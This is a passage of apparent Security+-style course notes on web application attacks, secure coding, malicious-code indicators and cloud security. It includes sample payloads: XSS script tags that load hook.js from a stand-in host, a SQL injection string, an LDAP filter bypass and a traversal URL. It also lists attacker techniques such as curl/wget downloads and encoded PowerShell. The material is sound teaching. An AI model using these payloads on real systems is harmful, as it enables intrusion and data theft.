■ Control characters, such as null string termination, carriage return,
line feed, end of file, and tab, are unsafe.
○ Percent encoding allows a user-agent to submit any safe or unsafe
character (or binary data) to the server within the URL.
○ Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input.

Application Programming Interface Attacks

● If the API isn't secure, threat actors can easily take advantage of it to
compromise the services and data stored on the web application.
● Some other common attacks against APIs target the following weaknesses and
vulnerabilities:
○ Ineffective secrets management, allowing threat actors to discover an API
key and perform any action authorized to that key.
○ Lack of input validation, allowing the threat actor to insert arbitrary
parameters into API methods and queries. This is often referred to as
allowing unsanitized input.
○ Error messages revealing clues to a potential adversary. For example, an
authentication error should not reveal whether a valid username has been
rejected because of an invalid password. The error should simply indicate
an authentication failure.
○ Denial of service (DoS) by bombarding the API with spurious calls.
Protection against this attack can be provided through throttling/rate-
limiting mechanisms.

Replay Attacks
 ● Session management is particularly important when it comes to user
authentication, as it is required to ensure the integrity of the account and the
confidentiality of data associated with it.
● To establish a session, the server normally gives the client some type of token.
● A replay attack works by sniffing or guessing the token value and then
submitting it to re-establish the session illegitimately.
● HTTP is nominally a stateless protocol, meaning that the server preserves no
information about the client, but mechanisms such as cookies have been
developed to preserve stateful data.
○ A cookie is created when the server sends an HTTP response header with
the cookie data.
○ A cookie has a name and value, plus optional security and expiry
attributes.

Session Hijacking and Cross-Site Request Forgery

● In the context of a web application, session hijacking most often means
replaying a cookie in some way.
● Attackers can sniff network traffic to obtain session cookies sent over an
unsecured network, like a public Wi-Fi hotspot.
● To counter cookie hijacking, you can encrypt cookies during the transmission
process, delete cookies from the client's browser cache when the client
terminates the session, and design your web app to deliver a new cookie with
each new session between the app and the client's browser.
● Session prediction attacks focus on identifying possible weaknesses in the
generation of session tokens that will enable an attacker to predict future valid
session values.
○ If an attacker can predict the session token, then the attacker can take
over a session that has yet to be established.
● Cross-Site Request Forgery:
○ A client-side or cross-site request forgery (CSRF or XSRF) can exploit
applications that use cookies to authenticate users and track sessions.
 ○ To work, the attacker must convince the victim to start a session with the
target site.
○ The attacker must then pass an HTTP request to the victim's browser that
spoofs an action on the target site, such as changing a password or an
email address.
○ If the target site assumes that the browser is authenticated because there
is a valid session cookie and doesn't complete any additional authorization
process on the attacker's input (or if the attacker is able to spoof the
authorization), it will accept the input as genuine.

○
● Clickjacking:
○ Clickjacking is an attack where what the user sees and trusts as a web
application with some sort of login page or form contains a malicious layer
or invisible iFrame (a web page embedded inside another web page) that
allows an attacker to intercept or redirect user input.
○ Clickjacking can be mitigated by using HTTP response headers that
instruct the browser not to open frames from different origins (domains)
and by ensuring that any buttons or input boxes on a page are positioned
on the top-most layer.
● SSL Strip:
 ○ A Secure Sockets Layer (SSL) strip attack is launched against clients on a
local network as they try to make connections to websites.
○ The threat actor must first perform a Man-in-the-Middle attack via Address
Resolution Protocol (ARP) positioning to masquerade as the default
gateway.
○ When a client requests an HTTP site that redirects to an HTTPS site in an
unsafe way, the sslstrip utility (https://github.com/moxie0/sslstrip) proxies
the request and response, serving the client the HTTP site, hopefully with
an unencrypted login form.
○ If the user enters credentials, they will be captured by the threat actor.
Sites can use the HTTP Strict Transport Security (HSTS) lists maintained
by browsers to prevent clients requesting HTTP in the first place.

Cross-Site Scripting
● A cross-site scripting (XSS) attack exploits the fact that the browser is likely to
trust scripts that appear to come from a site the user has chosen to visit.
● XSS inserts a malicious script that appears to be part of the trusted site. A
nonpersistent type of XSS attack would proceed as follows:
○ 1. The attacker identifies an input validation vulnerability in the trusted site.
○ 2. The attacker crafts a URL to perform a code injection against the
trusted site. This could be coded in a link from the attacker's site to the
trusted site or a link in an email message.
○ 3. When the user clicks the link, the trusted site returns a page containing
the malicious code injected by the attacker. As the browser is likely to be
configured to allow the site to run scripts, the malicious code will execute.
● The malicious code could be used to deface the trusted site (by adding any sort
of arbitrary HTML code), steal data from the user's cookies, try to intercept
information entered into a form, perform a request forgery attack, or try to install
malware
● An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack.
 ○ A stored/persistent XSS attack aims to insert code into a back-end
database or content management system used by the trusted site.
○ For example, the attacker may submit a post to a bulletin board with a
malicious script embedded in the message.
○ When other users view the message, the malicious script is executed. For
example, with no input sanitization, a threat actor could type the following
into a new post text field:
■ Check out this amazing <a
href="https://trusted.foo">website</a><script
src="https://badsite.foo/hook.js"></script>.
○ Users viewing the post will have the malicious script hook.js execute in
their browser.
● A third type of XSS attack exploits vulnerabilities in client-side scripts.
○ Such scripts often use the Document Object Model (DOM) to modify the
content and layout of a web page.
○ For example, the "document.write" method enables a page to take some
user input and modify the page accordingly.
○ An exploit against a client-side script could work as follows:
■ The attacker identifies an input validation vulnerability in the trusted
site. For example, a message board might take the user's name
from an input text box and show it in a header.
https://trusted.foo/messages?user=james
■ The attacker crafts a URL to modify the parameters of a script that
the server will return, such as:
https://trusted.foo/messages?user=James%3Cscript
%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js
%22%3E%3C%2Fscript%3E
■ The server returns a page with the legitimate DOM script
embedded, but containing the parameter:
James<script
src="https://badsite.foo/hook.js"></script>
 ■ The browser renders the page using the DOM script, adding the
text "James" to the header, but also executing the hook.js script at
the same time.

Structured Query Language Injection Attacks

● A server-side attack causes the server to do some processing or run a script or
query in a way that is not authorized by the application design.
○ Most server-side attacks depend on some kind of injection attack.
● In a SQL injection attack, the threat actor modifies one or more of these four
basic functions by adding code to some input accepted by the app, causing it to
execute the attacker's own set of SQL queries or parameters.
○ The main database operations are performed by SQL statements for
selecting data (SELECT), inserting data (INSERT), deleting data
(DELETE), and updating data (UPDATE).
● If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the
following malicious query will be executed:
○ SELECT * FROM tbl_user WHERE username = '' or 1=1--'
○ The logical statement 1=1 is always true, and the -- string turns the rest
of the statement into a comment, making it more likely that the web
application will parse this modified version and dump a list of all users.

XML and LDAP Injection Attacks

● Extensible Markup Language (XML) Injection:
○ Extensible Markup Language (XML) is used by apps for authentication
and authorizations, and for other types of data exchange and uploading.
○ Data submitted via XML with no encryption or input validation is vulnerable
to spoofing, request forgery, and injection of arbitrary data or code.
● Lightweight Directory Access Protocol (LDAP) Injection:
○ LDAP is specifically used to read and write network directory databases.
○ A threat actor could exploit either unauthenticated access or a vulnerability
in a client app to submit arbitrary LDAP queries.
 ○ This could allow accounts to be created or deleted, or for the attacker to
change authorizations and privileges.
○ LDAP filters are constructed from (name=value) attribute pairs delimited
by parentheses and the logical operators AND (&) and OR (|).
○ Adding filter parameters as unsanitized input can bypass access controls.
■ For example, if a web form authenticates to an LDAP directory with
the valid credentials Bob and Pa$$w0rd, it may construct a query
such as this from the user input:
● (&(username=Bob)(password=Pa$$w0rd))
■ If the form input is not sanitized, a threat actor could bypass the
password check by entering a valid username plus an LDAP filter
string, such as Bob)(&)). This causes the password filter to be
dropped for a condition that is always true:
● (&(username=Bob)(&))

Directory Traversal and Command Injection Attacks

● Directory Traversal: The threat actor submits a request for a file outside the web
server's root directory by submitting a path to navigate to the parent directory
(../).
○ This attack can succeed if the input is not filtered properly and access
permissions on the file are the same as those on the web server directory.
● The threat actor might use a canonicalization attack to disguise the nature of
the malicious input.
○ Canonicalization refers to the way the server converts between the
different methods by which a resource (such as a file path or URL) may be
represented and submitted to the simplest (or canonical) method used by
the server to process the input.
○ An attacker might be able to exploit vulnerabilities in the canonicalization
process to perform code injection or facilitate directory traversal.
○ For example, to perform a directory traversal attack, the attacker might
submit a URL such as:
 ■ http://victim.foo/?show=../../../../etc/config
● A command injection attack attempts to cause the server to run OS shell
commands and return the output to the browser.

Server-Side Request Forgery

● A server-side request forgery (SSRF) causes the server application to process
an arbitrary request that targets another service, either on the same host or a
different one.
● SSRF exploits both the lack of authentication between the internal servers and
services (implicit trust) and weak input validation, allowing the attacker to submit
unsanitized requests or API parameters.
● Many SSRF attacks depend on exploits against specific parsing mechanisms in
standard libraries for web servers, such as Apache or IIS, and web application
programming languages and tools, such as the curl library, Java, and PHP.
● SSRF can also use XML injection to exploit weaknesses in XML document
parsing.

●
 ● SSRF encompasses a very wide range of potential exploits and targets, some of
which include:
○ Reconnaissance—a response may contain metadata describing the type
and configuration of internal servers. SSRF can also be used to port scan
within the internal network.
○ Credential stealing—a response may contain an API key that the internal
servers use between themselves.
○ Unauthorized requests—the server-initiated request might change data or
access a service in an unauthorized way.
○ Protocol smuggling—despite initially being carried over HTTP, the SSRF
might target an internal SMTP or FTP server.

Secure Coding Techniques

● Some of the most important coding practices are input validation, output
encoding, and error handling.
● Input Validation:
○ A primary vector for attacking applications is to exploit faulty input
validation.
○ Input could include user data entered into a form or URL passed by
another application as a URL or HTTP header.
○ Malicious input could be crafted to perform an overflow attack or some
type of script or SQL injection attack.
○ To mitigate this risk, all input methods should be documented with a view
to reducing the potential attack surface exposed by the application.
● Normalization and Output Encoding:
○ Where an application accepts string input, the input should be subjected to
normalization procedures before being accepted.
○ Normalization means that a string is stripped of illegal characters or
substrings and converted to the accepted character set.
○ This ensures that the string is in a format that can be processed correctly
by the input validation routines.
 ○ Output encoding means that the string is re-encoded safely for the
context in which it is being used.
■ For example, a web form might perform input validation at the
client, but when it reaches the server, a PHP function performs
output encoding before composing an SQL statement.

Server-Side Versus Client-Side Validation

● A web application (or any other client-server application) can be designed to
perform code execution and input validation locally (on the client) or remotely (on
the server).
○ An example of client-side execution is a document object model (DOM)
script to render the page using dynamic elements from user input.
● The main issue with client-side validation is that the client will always be more
vulnerable to some sort of malware interfering with the validation process.
● The main issue with server-side validation is that it can be time-consuming, as it
may involve multiple transactions between the server and client.

Web Application Security

● Secure Cookies:
○ Cookies can be a vector for session hijacking and data exposure if not
configured correctly.
○ Some of the key parameters for the SetCookie header are:
■ Avoid using persistent cookies for session authentication. Always
use a new cookie when the user reauthenticates.
■ Set the Secure attribute to prevent a cookie being sent over
unencrypted HTTP.
■ Set the HttpOnly attribute to make the cookie inaccessible to
document object model/client-side scripting.
■ Use the SameSite attribute to control from where a cookie may be
sent, mitigating request forgery attacks.
● Response Headers:
 ○ A number of security options can be set in the response header returned
by the server to the client.
○ Some of the most important security-relevant header options are:
■ HTTP Strict Transport Security (HSTS)—forces browser to connect
using HTTPS only, mitigating downgrade attacks, such as SSL
stripping.
■ Content Security Policy (CSP)—mitigates clickjacking, script
injection, and other client-side attacks.
■ Cache-Control—sets whether the browser can cache responses.
Preventing caching of data protects confidential and personal
information where the client device might be shared by multiple
users.

Data Exposure and Memory Management

● Data exposure is a fault that allows privileged information (such as a token,
password, or personal data) to be read without being subject to the appropriate
access controls.
● Error Handling:
○ A well-written application must be able to handle errors and exceptions
gracefully.
○ This means that the application performs in a controlled way when
something unpredictable happens.
○ An error or exception could be caused by invalid user input, a loss of
network connectivity, another server or process failing, and so on.
○ Ideally, the programmer will have written a structured exception handler
(SEH) to dictate what the application should then do.
■ The main goal must be for the application not to fail in a way that
allows the attacker to execute code or perform some sort of
injection attack.
● Memory Management:
 ○ Many arbitrary code attacks depend on the target application having faulty
memory management procedures.
○ This allows the attacker to execute his or her own code in the space
marked out by the target application.

Secure Code Usage

● A program may make use of existing code in the following ways:
○ Code reuse—using a block of code from elsewhere in the same
application or from another application to perform a different function (or
perform the same function in a different context).
■ The risk here is that the copy and paste approach causes the
developer to overlook potential vulnerabilities (perhaps the
function's input parameters are no longer validated in the new
context).
○ Third-party library—using a binary package (such as a dynamic link
library) that implements some sort of standard functionality, such as
establishing a network connection or performing cryptography.
○ Software development kit (SDK)—using sample code or libraries of pre-
built functions from the programming environment used to create the
software or interact with a third party API.
○ Stored procedures—using a pre-built function to perform a database
query.
■ A stored procedure is a part of a database that executes a custom
query. The procedure is supplied an input by the calling program
and returns a predefined output for matched records.

Other Secure Coding Practices

● Unreachable Code and Dead Code:
○ Unreachable code is a part of application source code that can never be
executed.
 ■ For example, there may be a routine within a logic statement (If ...
Then) that can never be called because the conditions that would
call it can never be met.
○ Dead code can be described as either code that is executed but has no
effect on the program flow or code that will never be executed.
■ For example, there may be code to perform a calculation, but the
result is never stored as a variable or used to evaluate a condition.
● Obfuscation/Camouflage:
○ Code can be made difficult to analyze by using an obfuscator, which is
software that randomizes the names of variables, constants, functions,
and procedures, removes comments and white space, and performs other
operations to make the compiled code physically and mentally difficult to
read and follow.

Static Code Analysis

● Static code analysis (or source code analysis) is performed against the
application code before it is packaged as an executable process.
● The analysis tool will typically identify each line in a sequence of code that
creates the vulnerability and provide generic remediation advice, such as
ensuring that input for an SQL function is sanitized before use.
● Human analysis of software source code is described as a manual code review.

Dynamic Code Analysis

● Static code review techniques will not reveal vulnerabilities that might exist in the
runtime environment, such as exposure to race conditions or unexpected user
input.
● Dynamic analysis means that the application is tested under "real world"
conditions using a staging environment.
● Fuzzing:
 ○ A dynamic code analysis technique that involves sending a running
application random and unusual input so as to evaluate how the app
responds.
○ This is a form of "stress testing" that can reveal how robust the
application is.
● There are generally three types of fuzzers, representing different ways of
injecting manipulated input into the application:
○ Application UI—identify input streams accepted by the application, such
as input boxes, command line switches, or import/export functions.
○ Protocol—transmit manipulated packets to the application, perhaps using
unexpected values in the headers or payload.
○ File format—attempt to open files whose format has been manipulated,
perhaps manipulating specific features of the file.

Scripting
● Automation using scripting means that each configuration or build task is
performed by a block of code.
● A script will use the following elements:
○ Parameters that the script takes as input data (passed to the script as
arguments).
○ Branching and looping statements that can alter the flow of execution
based on logic conditions.
○ Validation and error handlers to check inputs and ensure robust execution.
○ Unit tests to ensure that the script returns the expected outputs, given the
expected inputs.

Python Script Environment

● Python is a popular language for implementing all kinds of development projects,
including automation tools and security tools, as well as malicious scripts.
● Where many languages use brackets to denote blocks of code, Python uses
indentation (4 spaces per level, by convention).
 ● Variables:
○ Python uses the = operator to assign a value to a variable.
○ Variables are not declared with a data type, such as string or integer, but
Python is strongly typed, meaning that you cannot add an integer variable
to a string variable, for instance.
● Functions:
○ Functions are used to produce modular, reusable code.
○ A function takes some arguments as parameters, performs some
processing, and typically returns some output.
● Logic and Looping Statements:
○ Branching and looping statements let you test conditions and perform
repetitive actions using compact code.
● Modules:
○ A Python module is a library of functions for accomplishing standard tasks,
such as opening a network socket or interacting with an operating
system's API.

Powershell Script Environments

● PowerShell is the preferred method of performing Windows administration tasks.
● It has also become the Windows hacker's go-to toolkit.
● Cmdlets and Functions:
○ Most PowerShell usage is founded on cmdlets.
○ A cmdlet is a compiled library that exposes some configuration or
administrative task, such as starting a VM in Hyper-V.
● Logic and Looping Statements:
○ PowerShell supports a wider range of branching and looping structures
than Python, including the switch and do statements.
● Modules:
○ PowerShell can also be used with a large number of modules, which are
added to a script using the Import-Module cmdlet.
Execution Control
● Execution control is the process of determining what additional software or
scripts may be installed or run on a host beyond its baseline.
● Allow and Block Lists:
○ Execution control can be implemented as either an allow list or a block list.
○ Allow list is a highly restrictive policy that means only running authorized
processes and scripts.
■ Allowing only specific applications that have been added to a list
will inevitably hamper users at some point and increase support
time and costs.
○ Block list is a permissive policy that only prevents execution of listed
processes and scripts.
● Code Signing:
○ Code signing is the principal means of proving the authenticity and
integrity of code (an executable or a script).
○ The developer creates a cryptographic hash of the file then signs the hash
using his or her private key.
● OS-Based Execution Control:
○ Software Restriction Policies (SRP)—available for most versions and
editions of Windows, SRP can be configured as group policy objects
(GPOs) to passlist file system locations from which executables and
scripts can launch.
○ AppLocker—improves configuration options and default usage of SRP.
○ Windows Defender Application Control (WDAC)—formerly Device Guard,
this can be used to create Code Integrity (CI) policies, which can be used
on their own or in conjunction with AppLocker.
■ CI policies can be based on version-aware and publisher digital
signatures, as well as image hashes and/or file paths. WDAC is a
useful option for preventing administrator accounts from disabling
execution control options
 ● In Linux, execution control is normally enforced by using a mandatory access
control (MAC) kernel module or Linux Security Module (LSM).

Malicious Code Indicators

● If you are performing threat hunting or observing malware in a sandbox, it is
helpful to consider the main types of malicious activity:
○ Shellcode—this is a minimal program designed to exploit a buffer overflow
or similar vulnerability to gain privileges, or to drop a backdoor on the host
if run as a Trojan.
○ Credential dumping—the malware might try to access the credentials file
(SAM on a local Windows workstation) or sniff credentials held in memory
by the lsass.exe system process.
○ Lateral movement/insider attack—the general procedure is to use the
foothold to execute a process remotely, using a tool such as psexec or
PowerShell.
○ Persistence—this is a mechanism that allows the threat actor's backdoor
to restart if the host reboots or the user logs off.

Powershell Malicious Indicators

● Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod,
New-Service, Create-Thread, Start-Process, and New-Object can indicate an
attempt to run some type of binary shellcode.
● Bypassing execution policy can also act as an indicator. The PowerShell code
may be called as a Base64 encoded string (-enc argument) or may use the -
noprofile or -ExecutionPolicy Bypass arguments.
● Using system calls to the Windows API might indicate an attempt to inject a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process:
● Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.
 ● The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
○ Use group policy to restrict execution of PowerShell to trusted accounts
and hosts.
○ Use group policy execution control to run scripts only from trusted
locations.
○ Consider use of Constrained Language Mode
(devblogs.microsoft.com/powershell/powershell-constrained-language-
mode) and signed scripts to limit the ability of exploit code to run on high-
value target systems.
● Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass access controls.

Bash and Python Malicious Indicators

● In Linux, the command line is usually Bourne Again Shell (Bash).
● A malicious script running on a Linux host might attempt the following:
○ Use commands such as whoami and ifconfig/ip/route to establish the local
context.
○ Download tools, possibly using wget or curl.
○ Add crontab entries to enable persistence.
○ Add a user with full sudo privileges and enable remote access via SSH.
○ Change firewall rules using iptables.
○ Use tools such as Nmap to scan for other hosts.
● Reverse Shell:
○ A maliciously spawned remote command shell where the victim host
opens the connection to the attacking host.

Macros and Visual Basic For Applications (VBA)

● A document macro is a sequence of actions performed in the context of a word
processor, spreadsheet, or presentation file.
 ● Microsoft Office uses the Visual Basic for Applications (VBA) language, while
PDF documents use JavaScript.
● A malicious actor will try to use a macro-enabled document to execute arbitrary
code.
○ For example, a Word document could be the vector for executing a
malicious PowerShell script.

Man-In-The-Browser Attack
● A man-in-the-browser (MitB) attack is a specific type of on-path attack where
the web browser is compromised.
● Depending on the level of privilege obtained, the attacker may be able to inspect
session cookies, certificates, and data, change browser settings, perform
redirection, and inject code.
● A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs.

Application Development, Deployment, and Automation

● Automation is the completion of an administrative task without human
intervention.
○ Task automation steps may be configurable through a GUI control panel,
via a command line, or via an API called by scripts.

Secure Application Development Environments

● A software development life cycle (SDLC) divides the creation and
maintenance of software into discrete phases.
○ There are two principal SDLCs: the waterfall model and Agile
development.
○ Both these models stress the importance of requirements analysis and
quality processes to the success of development projects.
● Quality Assurance (QA):
 ○ QC procedures are themselves defined by a quality assurance (QA)
process, which analyzes what constitutes "quality" and how it can be
measured and checked.
● Development Environments:

Provisioning, Deprovising, and Version Control

● Provisioning:
○ The process of deploying an application to the target environment, such
as enterprise desktops, mobile devices, or cloud infrastructure.
● Deprovisioning:
○ The process of removing an application from packages or instances.
○ This might be necessary if software has to be completely rewritten or no
longer satisfies its purpose.
● Version Control:
○ The practice of ensuring that the assets that make up a project are closely
managed when it comes time to make changes.
○ Version control supports the change management process for software
development projects.

Automation/Scripting Release Paradigms

● Continuous Integration:
○ Software development method in which code updates are tested and
committed to a development or build server/code repository rapidly.
● Continuous Delivery:
○ Where CI is about managing code in development, continuous delivery
is about testing all of the infrastructure that supports the app, including
networking, database functionality, client software, and so on.
● Continuous Deployment:
○ Software development method in which app and platform updates are
committed to production rapidly.
● Continuous Monitoring and Automated Courses of Action:
 ○ An automation solution will have a system of continuous monitoring to
detect service failures and security incidents.
○ Continuous monitoring might use a locally installed agent or heartbeat
protocol or may involve checking availability remotely.
● Continuous Validation:
○ The requirements model is tested using processes of verification and
validation (V&V):
■ Verification is a compliance testing process to ensure that the
product or system meets its design goals.
■ Validation is the process of determining whether the application is
fit-for-purpose (so for instance, its design goals meet the user
requirements).

Software Diversity
● An application's runtime environment will use one of two approaches for
execution on a host system:
○ Compiled code is converted to binary machine language that can run
independently on the target OS.
○ Interpreted code is packaged pretty much as is but is compiled line-by-line
by an interpreter, such as PowerShell or JavaScript.
● Software diversity can refer to obfuscation techniques to make code difficult to
detect as malicious.
○ This is widely used by threat actors in the form of shellcode compilers to
avoid signature detection, such as the venerable Shikata Ga Nai.
○ This can be used as a defensive technique. Obfuscating API methods and
automation code makes it harder for a threat actor to reverse engineer
and analyze the code to discover weaknesses.

Lesson 15: Implementing Secure Cloud Solutions

Cloud Deployment Models
● A cloud deployment model classifies how the service is owned and
provisioned.
● Cloud deployment models can be broadly categorized as follows:
○ Public (or multi-tenant)—a service offered over the Internet by cloud
service providers (CSPs) to cloud consumers.
○ Multi-cloud architectures are where an organization uses services from
multiple CSPs.
● Hosted Private—hosted by a third-party for the exclusive use of the organization.
● Private—cloud infrastructure that is completely private to and owned by the
organization.
○ With private cloud computing, organizations can exercise greater control
over the privacy and security of their services.
● Community—this is where several organizations share the costs of either a
hosted private or fully private cloud.
○ This is usually done in order to pool resources for a common concern, like
standardization and security policies.

Cloud Service Models

● These models are referred to as something or anything as a service (XaaS).
● Infrastructure as a service (IaaS) is a means of provisioning IT resources such
as servers, load balancers, and storage area network (SAN) components quickly.
● Software as a service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of
seats, a business would access software hosted on a supplier's servers on a
pay-as-you-go or lease arrangement (on-demand).
● Platform as a service (PaaS) provides resources somewhere between SaaS
and IaaS.
○ A typical PaaS solution would provide servers and storage network
infrastructure (as per IaaS) but also provide a multi-tier web
application/database platform on top.
Anything as a Service
● Security in the cloud is the things you must take responsibility for; security of the
cloud is the things the CSP manages.

Security as a Service
● You can classify such support in three general "tiers":
○ Consultants—the experience and perspective of a third-party professional
can be hugely useful in improving security awareness and capabilities in
any type of organization (small to large).
○ Managed Security Services Provider (MSSP)—a means of fully
outsourcing responsibility for information assurance to a third party.
■ This type of solution is expensive but can be a good fit for a SMB
that has experienced rapid growth and has no in-house security
capability.
○ Security as a Service (SECaaS)—can mean lots of different things, but is
typically distinguished from an MSSP as being a means of implementing a
particular security control, such as virus scanning or SIEM-like
functionality, in the cloud.
■ For example, an antivirus agent would scan files locally but be
managed and updated from the cloud provider.

Virtualization Technologies and Hypervisor Types

● Virtualization means that multiple operating systems can be installed and run
simultaneously on a single computer.
● A virtual platform requires at least three components:
○ Host hardware—the platform that will host the virtual environment.
Optionally, there may be multiple hosts networked together.
○ Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine
environment and facilitates interaction with the computer hardware and
network.
 ○ Guest operating systems, Virtual Machines (VM), or instances—
operating systems installed under the virtual environment.

Virtual Desktop Infrastructure and Thin Clients

● Virtual desktop infrastructure (VDI) refers to using a VM as a means of
provisioning corporate desktops.
● When the thin client starts, it boots a minimal OS, allowing the user to log on to a
VM stored on the company server infrastructure.
● The user makes a connection to the VM using some sort of remote desktop
protocol (Microsoft Remote Desktop or Citrix ICA, for instance).
● All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server.
○ The thin client computer must only be powerful enough to display the
screen image, play audio, and transfer mouse, key commands and video,
and audio information over the network.
● The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be
more costly in terms of lost productivity.

Application Virtualization and Container Virtualization

● Application virtualization is a more limited type of VDI.
● Rather than run the whole client desktop as a virtual platform, the client either
accesses an application hosted on a server or streams the application from the
server to the client for local processing.
● Application cell/container virtualization dispenses with the idea of a hypervisor
and instead enforces resource separation at the operating system level.
○ The OS defines isolated "cells" for each user instance to run in. Each cell
or container is allocated CPU and memory resources, but the processes
all run through the native OS kernel.
VM Escape Protection
● VM escaping refers to malware running on a guest OS jumping to another guest
or to the host.
● The classic timing attack is to send multiple usernames to an authentication
server and measure the server response times.
○ An invalid username will usually be rejected very quickly, but a valid one
will take longer (while the authentication server checks the password).
● Preventing VM escaping is dependent on the virtualization vendor identifying
security vulnerabilities in the hypervisor and on these being patched.

VM Sprawl Avoidance
● Each VM needs to be installed with its own security software suite to protect
against malware and intrusion attempts.
● Although one of the primary benefits of virtualization is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets
can also be the root of security issues.
● Virtual machine life cycle management (VMLM) software can be deployed to
enforce VM sprawl avoidance.
○ VMLM solutions provide you with a centralized dashboard for maintaining
and monitoring all the virtual environments in your organization.

Cloud Security Integration and Auditing

● Where indicators of on-premises attacks are found in local application logs and
network traffic, indicators of cloud-based attacks are found in API logs and
metrics.

Cloud Security Controls

● A third-party solution would typically be installed as a virtual instance within the
cloud.
○ For example, you might prefer to run a third-party next-generation firewall.
● Application Security and IAM
 ○ Application security in the cloud refers both to the software development
process and to identity and access management (IAM) features designed
to ensure authorized use of applications.
● Secrets Management:
○ A cloud service is highly vulnerable to remote access.

Cloud Compute Security

● The compute component provides process and system memory (RAM) resource
as required for a particular workload.
● Container Security
○ A container uses many shared components on the underlying platform,
meaning it must be carefully configured to reduce the risk of data
exposure.
● API Inspection and Integration:
○ The API is the means by which consumers interact with the cloud
infrastructure, platform, or application.
○ Monitoring API usage gives warning if the system is becoming overloaded
(ensuring availability) and allows detection of unauthorized usage or
attempted usage.
○ Number of requests—this basic load metric counts number of requests per
second or requests per minute.
○ Latency—this is the time in milliseconds (ms) taken for the service to
respond to an API call.
○ Error rates—this measures the number of errors as a percentage of total
calls, usually classifying error types under category headings.
○ Unauthorized and suspicious endpoints—connections to the API can be
managed in the same sort of way as remote access.

Cloud Storage Security

● The storage component means the provisioning of persistent storage capacity.
● Permissions and Resource Policies:
 ○ As with on-premises systems, cloud storage resources must be configured
to allow reads and/or writes only from authorized endpoints.
● Encryption:
○ Each storage unit is encrypted using an AES key.
○ If an attacker were to physically access a data center and copy or remove
a disk, the data on the disk would not be readable.
○ With CSP-managed keys, the cloud provider handles this process by
using the access control rights configured on the storage resource to
determine whether access is approved and, if so, making the key available
to the VM or container.

High Availability
● Replication:
○ Data replication allows businesses to copy data to where it can be
utilized most effectively.
○ Data replication requires low-latency network connections, security, and
data integrity.
○ The terms hot and cold storage refer to how quickly data is retrieved.
■ Hot storage retrieves data more quickly than cold, but the quicker
the data retrieval, the higher the cost.
● High Availability across Zones:
○ The availability zones have independent data centers with their own
power, cooling, and network connectivity.
○ Local replication—replicates your data within a single data center in the
region where you created your storage account.
○ Regional replication (also called zone-redundant storage)—replicates your
data across multiple data centers within one or two regions.
○ Geo-redundant storage (GRS)—replicates your data to a secondary
region that is distant from the primary region.
Cloud Networking Security
● Virtual Private Clouds (VPCs):
○ Each customer can create one or more virtual private clouds (VPCs)
attached to their account.
○ By default, a VPC is isolated from other CSP accounts and from other
VPCs operating in the same account.
● Public and Private Subnets:
○ Each subnet within a VPC can either be private or public.
○ To configure a public subnet, first an Internet gateway (virtual router) must
be attached to the VPC configuration.
○ The Internet gateway performs 1:1 network address translation (NAT) to
route Internet communications to and from the instance.

VPCs and Transit Gateways

● Connectivity can also be configured between VPCs in the same account or with
VPCs belonging to different accounts, and between VPCs and on-premises
networks.
● Traditionally, VPCs can be interconnected using peering relationships and
connected with on-premises networks using VPN gateways.
● Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways.

VPC Endpoints
● A VPC endpoint is a means of publishing a service so that it is accessible by
instances in other VPCs using only the AWS internal network and private IP
addresses.
● This means that the traffic is never exposed to the Internet.
● There are two types of VPC endpoint: gateway and interface.
● Gateway Endpoints:
○ A gateway endpoint is used to connect instances in a VPC to the AWS S3
(storage) and DynamoDB (database) services.
 ○ A gateway endpoint is configured as a route to the service in the VPC's
route table.
● Interface Endpoints:
○ An interface endpoint makes use of AWS's PrivateLink feature to allow
private access to custom services:
■ A custom service provider VPC is configured by publishing the
service with a DNS host name.
■ A VPC endpoint interface is configured in each service consumer
VPC subnet.
■ Each instance within the VPC subnet is configured to use the
endpoint address to contact the service provider.

Cloud Firewall Security

● Firewalls work with multiple accounts, VPCs, subnets within VPCs, and instances
within subnets to enforce the segmentation required by the architectural design.

Security Groups
● In AWS, basic packet filtering rules managing traffic that each instance will
accept can be managed through security groups.
● A security group provides stateful inbound and outbound filtering at layer 4.
○ The stateful filtering property means that it will allow established and
related traffic if a new connection has been accepted.
● There are no deny rules for security groups; any traffic that does not match an
allow rule is dropped.

Cloud Access Security Brokers

● A cloud access security broker (CASB) is enterprise management software
designed to mediate access to cloud services by users across all types of
devices.
● Some of the functions of a CASB are:
 ○ Enable single sign-on authentication and enforce access controls and
authorizations from the enterprise network to the cloud provider.
○ Scan for malware and rogue or non-compliant device access.
○ Monitor and audit user and resource activity.
○ Mitigate data exfiltration by preventing access to unauthorized cloud
services from managed devices.
● In general, CASBs are implemented in one of three ways:
○ Forward proxy—this is a security appliance or host positioned at the client
network edge that forwards user traffic to the cloud network if the contents
of that traffic comply with policy.
○ Reverse proxy—this is positioned at the cloud network edge and directs
traffic to cloud services if the contents of that traffic comply with policy.

Services Integration and Microservices

● Service-Oriented Architecture (SOA):
○ Conceives of atomic services closely mapped to business workflows.
○ Each service takes defined inputs and produces defined outputs.
○ The key features of a service function are that it is self-contained, does not
rely on the state of other services, and exposes clear input/output (I/O)
interfaces.
● Microservices:
○ A software architecture where components of the solution are conceived
as highly decoupled services not dependent on a single platform type or
technology.
● Services Integration and Orchestration:
○ Orchestration: The automation of multiple steps in a deployment process.
○ For orchestration to work properly, automated steps must occur in the
right sequence, taking dependencies into account; it must provide the right
security credentials at every step along the way; and it must have the
rights and permissions to perform the defined tasks.
Application Programming Interfaces
● There are two predominant "styles" for creating web application APIs:
